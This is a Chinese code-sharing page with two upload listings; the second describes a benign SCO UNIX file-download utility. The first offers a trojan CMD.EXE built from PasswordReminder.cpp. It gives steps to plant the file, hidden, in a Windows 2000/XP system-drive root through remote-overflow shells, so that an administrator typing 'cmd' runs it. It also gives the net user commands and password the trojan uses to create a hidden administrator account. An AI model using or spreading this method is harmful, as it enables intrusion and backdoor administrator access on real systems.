你是不是經常在開始菜單的運行窗口里運行命令呢? 看看這個漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在執行搜索的時候, 首先查找根目錄 而開始菜單的運行窗口里執行命令, 也是首先在系統盤的根目錄里進行查找. 這個漏洞其實是已經是公開的秘密了. 既然現在作為漏洞公布出來, 我也就把網上的PasswordReminder.cpp拿來改了改 加了一個加超級管理員用戶和執行cmd.exe的功能. 使用方法: 把程序解壓, 把壓縮包里的文件 CMD.EXE (該文件具有隱藏和只讀屬性) 釋放到目標機器的系統盤根目錄, 一般都是在C:比如利用UNICODE/Decode漏洞就有寫根目錄的權限, 同時Asp/fp30reg.dll等遠程溢出出來的Shell, 一般都只有匿名權限, 但是它具有寫根目錄的權限 這個時候, 就可以把本程序放到目標機器的系統盤根目錄 只要等管理員在機器的開始菜單里運行命令: cmd 一切盡在掌握中.:) PS: 系統執行后, 會先產生一個線程來做一些處理 然后用system()函數調用cmd.exe來讓用戶能夠執行命令. 產生出來的線程會產生兩個進程序執行如下兩個命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 這樣就在系統上增加了一個超級
標簽:
964057
zdnet
http
2100
上傳時間:
2015-01-12
上傳用戶:qlpqlq
應用平臺 SCO OpenServer 5 編譯命令 cc -o fget fget.c -lcurses 此程序適用于SCO UNIX主機系統,客戶端為任意平臺. 以Windows客戶為例,以下簡要說明其使用方法. 1、直接撥號方式 先進入Windows的終端仿真器, 使用ATDT命令向UNIX主機撥號,當主機連通時, 運行主機的FGET程序,格式為 FGET 下載文件名.然后,從終端仿真器的傳輸" 菜單選接收二進制文件選項,輸入本地文件名后,即可接收文件. 2、internet連接方式 先將FGET文件在主機上編譯通過, 然后用Netterm之類的telnet 軟件連接到主機上,當主機連通時,運行主機的FGET程序,格式為 FGET 下載文件名. 然后從菜單選接收文件選項,輸入本地文件名后,即可接收文件.
標簽:
fget
OpenServer
SCO
lcurses
上傳時間:
2015-02-11
上傳用戶:shus521